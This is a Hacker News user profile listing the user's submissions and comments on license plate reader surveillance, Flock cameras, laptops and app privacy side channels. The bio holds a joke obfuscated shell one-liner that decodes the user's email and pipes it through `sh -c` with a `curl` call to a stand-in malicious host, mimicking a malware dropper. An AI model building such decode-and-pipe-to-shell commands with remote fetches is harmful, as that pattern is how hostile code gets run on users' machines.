HN user

sodality2

4,710 karma

echo "dWFAem5nZ3Vyai5mcHZyYXBy" | base64 -d | tr 'a-z' 'n-za-m' | sed 'p;p;p;p;p;p;p;p;p;p;' | uniq -d | sort -r | head -n1 | sh -c "curl -sf 'https://fake-malicious-ser.ver' |:& less <&0"

hn@matthew.science

Posts18
Comments1,354
View on HN
alpranalysis.com 7mo ago

Show HN: Automated license plate reader coverage in the USA

sodality2
239pts146
focusguardian.org 1y ago

Show HN: FocusGuardian – Block distracting sites on any device, on your schedule

sodality2
3pts0
matthew.science 2y ago

I built a SaaS in 24 hours

sodality2
3pts0
matthew.science 2y ago

Fixing Libreddit – Now Redlib

sodality2
2pts0
matthew.science 2y ago

Building an occupancy sensor with a $5 ESP32 and a serverless DB

sodality2
670pts214
wmit-pages-prod.s3.amazonaws.com 3y ago

Video Games and Virtual Sins [pdf]

sodality2
3pts0
github.com 3y ago

CVE-2023-26964 GitHub Issue – DoS within Hyper, Rust HTTP library

sodality2
2pts0
sauron.matthew.science 3y ago

Show HN: Sauron – A live news visualization map

sodality2
11pts2
news.ycombinator.com 3y ago

Ask HN: Can adding an ongoing side business (SaaS) on my resume hurt me?

sodality2
7pts13
matthew.science 4y ago

Show HN: HJKL Trainer - Get used to HJKL Vim keybinds

sodality2
2pts0
github.com 4y ago

Show HN: Vocrab, a lightweight front end for Thesaurus.com

sodality2
2pts0
news.ycombinator.com 4y ago

Ask HN: How would you keep in touch with a group of people for 10 years?

sodality2
5pts6
www.zeditor.app 4y ago

Zas Editor

sodality2
646pts340
highassurance.rs 4y ago

High Assurance Rust: Developing Secure and Robust Software

sodality2
120pts41
trilium.cc 4y ago

Show HN: Trilium.cc – Paid hosting for Trilium Notes, a personal knowledge base

sodality2
24pts3
matthew.science 4y ago

Finding three bugs in the Markdown crate with cargo-fuzz

sodality2
5pts0
web.archive.org 4y ago

Internet Archive services are temporarily offline

sodality2
4pts2
github.com 4y ago

Trilium Notes redesign – v0.48.0-beta

sodality2
3pts1

Side channels that enable intended behavior, versus a flat-out bug like the above, though the line can often be muddied by perspective.

An example that comes to mind that I've seen is an anonymous app that allows for blocking users; you can programmatically block users, query all posts, and diff the sets to identify stable identities. However, the ability to block users is desired by the app developers; they just may not have intended this behavior, but there's no immediate solution to this. This is different than 'user_id' simply being returned in the API for no reason, which is a vulnerability. Then there's maybe a case of the user_id being returned in the API for some reason that MIGHT be important too, but that could be implemented another way more sensibly; this leans more towards vulnerability.

Ultimately most fingerprinting technologies use features that are intended behavior; Canvas/font rendering is useful for some web features (and the web target means you have to support a LOT of use cases), IP address/cookies/useragent obviously are useful, etc (though there's some case to be made about Google's pushing for these features as an advertising company!).

I'm not sure I'd use "compromise" at all - these (or the ones I have) are purposefully designed with zero authentication or pairing, the ones that use apps are already "compromised" in the sense that I can walk past any windowsill with one in it, open it, and it will immediately connect to it. I really don't mind if someone walking by were to change the LED color patterns

Stop Flock 3 months ago

Yep, here they admitted there were local revolutionary war re-enactors who were falsely flagged (although thankfully they didn't let it get past the first flag).

Stop Flock 3 months ago

This is a very common pattern; my university pushed through a ZeroEyes AI camera/open carry weapon detection contract within 2 weeks of a shooting at a nearby school, even though it’s trivial to bypass by hiding it; it’s most probably just (gruesome as it is to think about) a bad press insurance so if anything happened, they can say they had “state of the art AI detection” and they did all they could. No one wants to be the one caught not doing “all they could” against the media cacophony in the immediate aftermath.

Is there any evidence that going outside the scope of the agreement would amount to anything more than a contract violation? Are we really to expect that Anthropic general counsel sits at the API gates allowing or blocking requests?

More generally, are there any comparable contract requirements in the field of defense, for a company in the same position as Anthropic? I'm curious.

MacBook Neo 5 months ago

Hm true, I wrote off Chrome OS altogether, does it provide enough customizability that MacOS/Linux does? You mention dev containers which is already way beyond my perception of its capabilities (and the general public, I think)

MacBook Neo 5 months ago

Yeah, the optimization is going to make or break it. I've heard people say that 8GB on their Air's with M chips are sufficient, but I do wonder if it will still be true now with MacOS - maybe we'll get a cleanup/performance release cycle?... With regards to AI I hope it's not a Gemini/Pixel situation where there's a lot of ram but 3.5GB are permanently reserved for the on-device model to be always-available.

MacBook Neo 5 months ago

I expect the customer of this product is not worried about repairability: to them, it's just an iPad with a keyboard. You're also citing 3x higher costs, so they're really not comparable.

The lack of upgradability is directly what provides a lot of benefits that I expect the average consumer vastly prefers: better performance with soldered memory and better battery life. It's not just to shaft you on prices (though that's definitely a big factor).

MacBook Neo 5 months ago

iPads are pretty common in education for the drawing capabilities. You can take notes by typing for most things, but when you get diagram/math heavy, you just cannot beat the pencil. I think it's probably pretty poor value of the small ability you gain to cost, relative to other things you could do (I like paper/pencil personally) but I see the use case, if limited.

MacBook Neo 5 months ago

Crazy good market segmentation by Apple here - it's pretty easy for college students to justify this plus an iPad, and still have to upgrade to a "real" laptop post-grad.

Personally this looks really compelling for students - I did something similar, dinky 4GB ram 2 core laptop with crazy good battery life - because I don't care about specs at all, LMS's and note-taking apps in school are not heavy. I just NEED to be able to work all day long, when lecture halls lack outlets. If I needed development weight I would just use an IDE plugin to remote to a desktop in my dorm.

Are there any similar laptops around this price range with comparable battery life? My impression is the market around ARM laptops is pretty small. If so this is a standout for this use case.

If only the average open source project got this level of scrutiny actually checking for vulnerabilities. I get that you don't want your private chats leaked by slopcode, but this was a few dozen lines of scaffolding in large software created before LLM coding; it would have been better to register your discontent without making demands, then continue to watch the repo for vulnerabilities. This feels like fervor without any work behind it

I've brought my kindle to even the most strict of technology-banned lectures (with punishments like dropping a letter grade after one violation, and failing you after two), and never have they given me a problem when asked. They realize the issue isn't the silicon or lithium, it's the distractions it enables. I'm sure I could connect to some LLM on it, it's just that no one ever will.

The solution is to learn content that you actually use with some regularity in your life outside of the testing! If you're doing this for education, the payoff might be the exam; if you're doing it to learn things without some particular end goal, you'll have to make your own way to make it worth it.

The language learning app people could try scheduling monthly video chats with native speakers (swapping turns halfway through so it's mutually beneficial) and notice their proficiency improve.

alpr.watch 7 months ago

I definitely think there's something to be said for nuance; my county is one of the worst in my state for penetration [0] but according to their transparency log avoids many of the common criticisms of Flock, like data sharing, immigration enforcement use, etc [1].

I'm just happy for any sort of critical analysis or attention being brought to every municipality's use of this technology as so often people have no idea at all, though. Because there are a lot of counties which are far worse, and almost none of the public is even aware; I suspect there is at least some gap between people who would care if they knew, and people who care now.

[0] https://alpranalysis.com/virginia/206807

[1] https://transparency.flocksafety.com/williamsburg-va-pd

alpr.watch 7 months ago

It's definitely a push and pull; more are adopting it, but more are pushing back. The total amount is definitely still rising, though, but so is awareness.

There's Eugene and Springfield, OR; Cambridge, MA; a few in TX; Denver and Longmont, CO; Redmond, WA; Evanston and Oak Park, IL; etc.

alpr.watch 7 months ago

I can opt out of that, by not carrying a phone. I cannot opt out of public surveillance. Plus at least the gap between police -> tech companies typically adds some resistance, maybe a warrant, etc. With ALPR's police have immediate access without warrants to the nationwide network. It's far more ripe for abuse, yet is exactly what the police departments want; the only chance is local governance.

alpr.watch 7 months ago

It’s so awesome to see more people making things to fight back against ALPRs. Deflock movements are gaining traction across the country and genuinely making progress at suspension or cancellation of contracts.

Not too harsh at all! I just wanted to fill the gap between "man, those cameras seem to be everywhere" and "XX% of people are surveilled on the average commute". It's true that this is not a particularly ambitious project, just a small niche I wanted to fill.

I don't model daily paths as in 'coffee before work, then groceries on the way home'; I do straight shots from residences to each of these amenities. I don't know of a better way to do it than this; any more complicated model that tries to model 'daily routines' risks losing simplicity, as well as straying too far from actual driving behavior, and my main goal is extremely simple statistics.

My goal is to provide actionable statistics for any 'deflock' movements in a certain county, by being able to point to specific statistics on surveillance. If even one motivated person uses my data to petition, I'll be happy; it doesn't have to be for the average person. There's tons of these movements, too. Deflock Olympia just succeeded: https://www.yelmonline.com/stories/commentary-olympia-joins-...

Also, another answer to this is that there is no overarching goal; I just wanted to build a large scale data analysis pipeline for fun :) I am no stranger to side projects to distract me from finals unfortunately.

The best thing you can do is keep an eye out and tag them manually. The second best is a FOIA to your county government - there's some good examples on deflock.me and templates on muckrack. But private ones are not going to be FOIA-able.

The quality of ALPR tagging does probably lag behind true counts - for example, Williamsburg, VA has 28 tagged on OSM, but 32 are listed in the transparency log (https://transparency.flocksafety.com/williamsburg-va-pd). Unfortunately not much can be done except spotting them out and about (or wardriving with a BLE beacon scanner: https://www.ryanohoro.com/post/spotting-flock-safety-s-falco...)